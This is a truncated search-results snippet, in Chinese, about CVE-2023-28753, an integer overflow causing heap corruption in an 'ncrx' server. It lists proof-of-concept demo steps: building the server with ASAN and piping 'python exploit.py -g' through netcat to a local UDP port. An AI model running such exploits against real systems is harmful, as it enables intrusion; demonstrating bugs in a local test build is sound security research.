15 matches found
CVE-2023-28753
CVE-2023-28753 一个可能导致堆内存破坏的整数溢出漏洞。 为了演示堆破坏: 使用 ASAN 构建 ncrx 服务器 root@kitploit: make ./ncrx 31337 对抗性客户端 root@kitploit: python exploit.py -g | nc -u 127.0.0.1 31337...